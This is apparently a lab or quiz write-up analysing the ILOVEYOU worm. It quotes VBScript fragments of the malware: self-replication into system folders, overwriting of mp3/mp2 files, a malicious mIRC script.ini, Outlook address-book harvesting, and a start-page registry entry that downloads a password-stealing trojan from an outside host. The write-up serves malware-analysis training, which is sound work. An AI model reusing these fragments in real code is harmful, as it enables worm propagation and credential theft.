ILOVEYOU

What is the text present as part of email when the victim received this malware? (1 points)

male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."

What is the domain name that was added as the browser's homepage? (1 points)

If num = 1 Then
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~younHJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

http://www.skyinet.net/

The malware replicated itself into 3 locations, what are they? (1 points)

rem Copy itself into VBScript files MSKernel32.vbs, Win32DLL.vbs and
rem LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem & "\MSKernel32.vbs")
c.Copy(dirwin & "\Win32DLL.vbs")
c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")

C:\Windows\System32\MSKernel32.vbs, C:\Windows\System32\LOVE-LETTER-FOR-YOU.TXT.vbs, C:\Windows\Win32DLL.vbs

What is the name of the file that looks for the filesystem? (1 points)

rem Check if a file named "WinFAT32.exe" exists in the system files.
If (fileexist(dirsystem & "\WinFAT32.exe") = 1) Then
  Randomize

WinFAT32.exe

Which file extensions, beginning with m, does this virus target? (1 points)

  cop.copy(f1.path & ".vbs")
  fso.DeleteFile(f1.path)
rem Copies itself into every file with mp3/mp2 extension.
ElseIf (ext = "mp3") Or (ext = "mp2") Then
  Set mp3 = fso.CreateTextFile(f1.path & ".vbs")

mp3, mp2

What is the name of the file generated when the malware identifies any Internet Relay Chat service? (1 points)

If (eq <> folderspec) Then
  rem Looks for mIRC and related files to determine whether it
  rem should create/replace its script.ini with a malicious script.
  If (s = "mirc32.exe")
    Or (s = "mlink32.exe")
    Or (s = "mirc.ini")
    Or (s = "script.ini")
    Or (s = "mirc.hlp")
  Then

script.ini

What is the name of the password stealing trojan that is downloaded by the malware? (1 points)

# https://en.wikipedia.org/wiki/ILOVEYOU

Barok

What is the name of the email service that is targeted by the malware? (1 points)

Set out = WScript.CreateObject("Outlook.Application")

Outlook

What is the registry entry responsible for reading the contacts of the logged in email account? (1 points)

Set a = mapi.AddressLists(ctrlists)
x = 1
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)

HKEY_CURRENT_USER\Software\Microsoft\WAB\

What is the value that is stored in the registry to remember that an email was already sent to a user? (1 points)

If (regv = "") Then
  regv = 1
End If

1
PreviousPhishing Analysis 2NextMeta

Last updated

Was this helpful?